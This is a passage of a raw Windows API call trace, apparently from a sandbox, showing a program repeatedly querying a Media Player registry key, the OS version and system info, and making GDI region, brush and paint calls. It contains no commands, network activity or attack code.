RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.745] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401d9 [0090.745] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401dc [0090.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045957 [0090.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045958 [0090.745] CombineRgn (hrgnDst=0x1045957, hrgnSrc1=0x7c0401d9, hrgnSrc2=0x7a0401dc, iMode=1) returned 1 [0090.745] CombineRgn (hrgnDst=0x1045958, hrgnSrc1=0x7c0401d9, hrgnSrc2=0x7a0401dc, iMode=4) returned 2 [0090.745] CreateSolidBrush (color=0xff) returned 0x2105956 [0090.745] CreateSolidBrush (color=0xff0000) returned 0x1105959 [0090.745] DeleteObject (ho=0x1105959) returned 1 [0090.745] DeleteObject (ho=0x7a0401dc) returned 1 [0090.745] DeleteObject (ho=0x7c0401d9) returned 1 [0090.745] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.745] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.745] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.745] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.745] BeginPath (hdc=0x0) returned 0 [0090.745] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.745] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.745] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.745] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.745] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.745] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401dc [0090.745] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401d9 [0090.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104595a [0090.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104595b [0090.745] CombineRgn (hrgnDst=0x104595a, hrgnSrc1=0x7b0401dc, hrgnSrc2=0x7d0401d9, iMode=1) returned 1 [0090.745] CombineRgn (hrgnDst=0x104595b, hrgnSrc1=0x7b0401dc, hrgnSrc2=0x7d0401d9, iMode=4) returned 2 [0090.745] CreateSolidBrush (color=0xff) returned 0x2105959 [0090.746] CreateSolidBrush (color=0xff0000) returned 0x110595c [0090.746] DeleteObject (ho=0x110595c) returned 1 [0090.746] DeleteObject (ho=0x7d0401d9) returned 1 [0090.746] DeleteObject (ho=0x7b0401dc) returned 1 [0090.746] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.746] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.746] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.746] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.746] BeginPath (hdc=0x0) returned 0 [0090.746] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.746] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.746] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.746] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.746] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401d9 [0090.746] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401dc [0090.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104595d [0090.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104595e [0090.746] CombineRgn (hrgnDst=0x104595d, hrgnSrc1=0x7e0401d9, hrgnSrc2=0x7c0401dc, iMode=1) returned 1 [0090.746] CombineRgn (hrgnDst=0x104595e, hrgnSrc1=0x7e0401d9, hrgnSrc2=0x7c0401dc, iMode=4) returned 2 [0090.746] CreateSolidBrush (color=0xff) returned 0x210595c [0090.746] CreateSolidBrush (color=0xff0000) returned 0x110595f [0090.746] DeleteObject (ho=0x110595f) returned 1 [0090.746] DeleteObject (ho=0x7c0401dc) returned 1 [0090.746] DeleteObject (ho=0x7e0401d9) returned 1 [0090.746] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.746] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.746] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.746] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.746] BeginPath (hdc=0x0) returned 0 [0090.746] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.746] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.747] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.747] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.747] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401dc [0090.747] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401d9 [0090.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045960 [0090.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045961 [0090.747] CombineRgn (hrgnDst=0x1045960, hrgnSrc1=0x7d0401dc, hrgnSrc2=0x7f0401d9, iMode=1) returned 1 [0090.747] CombineRgn (hrgnDst=0x1045961, hrgnSrc1=0x7d0401dc, hrgnSrc2=0x7f0401d9, iMode=4) returned 2 [0090.747] CreateSolidBrush (color=0xff) returned 0x210595f [0090.747] CreateSolidBrush (color=0xff0000) returned 0x1105962 [0090.747] DeleteObject (ho=0x1105962) returned 1 [0090.747] DeleteObject (ho=0x7f0401d9) returned 1 [0090.747] DeleteObject (ho=0x7d0401dc) returned 1 [0090.747] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.747] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.747] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.747] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.747] BeginPath (hdc=0x0) returned 0 [0090.747] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.747] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.747] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.747] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.747] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401d9 [0090.747] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401dc [0090.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045963 [0090.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045964 [0090.748] CombineRgn (hrgnDst=0x1045963, hrgnSrc1=0x800401d9, hrgnSrc2=0x7e0401dc, iMode=1) returned 1 [0090.748] CombineRgn (hrgnDst=0x1045964, hrgnSrc1=0x800401d9, hrgnSrc2=0x7e0401dc, iMode=4) returned 2 [0090.748] CreateSolidBrush (color=0xff) returned 0x2105962 [0090.748] CreateSolidBrush (color=0xff0000) returned 0x1105965 [0090.748] DeleteObject (ho=0x1105965) returned 1 [0090.748] DeleteObject (ho=0x7e0401dc) returned 1 [0090.748] DeleteObject (ho=0x800401d9) returned 1 [0090.748] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.748] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.748] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.748] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.748] BeginPath (hdc=0x0) returned 0 [0090.748] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.748] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.748] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.748] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.898] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401dc [0090.899] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401d9 [0090.899] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3045967 [0090.899] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3045968 [0090.899] CombineRgn (hrgnDst=0x3045967, hrgnSrc1=0x7f0401dc, hrgnSrc2=0x810401d9, iMode=1) returned 1 [0090.899] CombineRgn (hrgnDst=0x3045968, hrgnSrc1=0x7f0401dc, hrgnSrc2=0x810401d9, iMode=4) returned 2 [0090.899] CreateSolidBrush (color=0xff) returned 0x2105965 [0090.899] CreateSolidBrush (color=0xff0000) returned 0x2105966 [0090.899] DeleteObject (ho=0x2105966) returned 1 [0090.899] DeleteObject (ho=0x810401d9) returned 1 [0090.899] DeleteObject (ho=0x7f0401dc) returned 1 [0090.899] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.899] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.899] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.899] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.899] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.899] BeginPath (hdc=0x0) returned 0 [0090.899] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.899] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.899] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.899] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.899] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.899] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.899] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.899] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.899] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401d9 [0090.899] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401dc [0090.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045969 [0090.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104596a [0090.900] CombineRgn (hrgnDst=0x1045969, hrgnSrc1=0x820401d9, hrgnSrc2=0x800401dc, iMode=1) returned 1 [0090.900] CombineRgn (hrgnDst=0x104596a, hrgnSrc1=0x820401d9, hrgnSrc2=0x800401dc, iMode=4) returned 2 [0090.900] CreateSolidBrush (color=0xff) returned 0x3105966 [0090.900] CreateSolidBrush (color=0xff0000) returned 0x110596b [0090.900] DeleteObject (ho=0x110596b) returned 1 [0090.900] DeleteObject (ho=0x800401dc) returned 1 [0090.900] DeleteObject (ho=0x820401d9) returned 1 [0090.900] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.900] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.900] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.900] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.900] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.900] BeginPath (hdc=0x0) returned 0 [0090.900] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.900] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.900] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.900] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.900] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.900] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.900] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401dc [0090.900] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401d9 [0090.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104596c [0090.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104596d [0090.900] CombineRgn (hrgnDst=0x104596c, hrgnSrc1=0x810401dc, hrgnSrc2=0x830401d9, iMode=1) returned 1 [0090.900] CombineRgn (hrgnDst=0x104596d, hrgnSrc1=0x810401dc, hrgnSrc2=0x830401d9, iMode=4) returned 2 [0090.900] CreateSolidBrush (color=0xff) returned 0x210596b [0090.900] CreateSolidBrush (color=0xff0000) returned 0x110596e [0090.900] DeleteObject (ho=0x110596e) returned 1 [0090.900] DeleteObject (ho=0x830401d9) returned 1 [0090.900] DeleteObject (ho=0x810401dc) returned 1 [0090.900] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.900] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.901] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.901] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.901] BeginPath (hdc=0x0) returned 0 [0090.901] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.901] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.901] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.901] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.901] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.901] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401d9 [0090.901] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401dc [0090.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104596f [0090.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045970 [0090.901] CombineRgn (hrgnDst=0x104596f, hrgnSrc1=0x840401d9, hrgnSrc2=0x820401dc, iMode=1) returned 1 [0090.901] CombineRgn (hrgnDst=0x1045970, hrgnSrc1=0x840401d9, hrgnSrc2=0x820401dc, iMode=4) returned 2 [0090.901] CreateSolidBrush (color=0xff) returned 0x210596e [0090.901] CreateSolidBrush (color=0xff0000) returned 0x1105971 [0090.901] DeleteObject (ho=0x1105971) returned 1 [0090.901] DeleteObject (ho=0x820401dc) returned 1 [0090.901] DeleteObject (ho=0x840401d9) returned 1 [0090.901] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.901] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.901] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.901] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.901] BeginPath (hdc=0x0) returned 0 [0090.901] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.901] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.901] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.902] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.902] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401dc [0090.902] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401d9 [0090.902] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045972 [0090.902] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045973 [0090.902] CombineRgn (hrgnDst=0x1045972, hrgnSrc1=0x830401dc, hrgnSrc2=0x850401d9, iMode=1) returned 1 [0090.902] CombineRgn (hrgnDst=0x1045973, hrgnSrc1=0x830401dc, hrgnSrc2=0x850401d9, iMode=4) returned 2 [0090.902] CreateSolidBrush (color=0xff) returned 0x2105971 [0090.902] CreateSolidBrush (color=0xff0000) returned 0x1105974 [0090.902] DeleteObject (ho=0x1105974) returned 1 [0090.902] DeleteObject (ho=0x850401d9) returned 1 [0090.902] DeleteObject (ho=0x830401dc) returned 1 [0090.902] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, 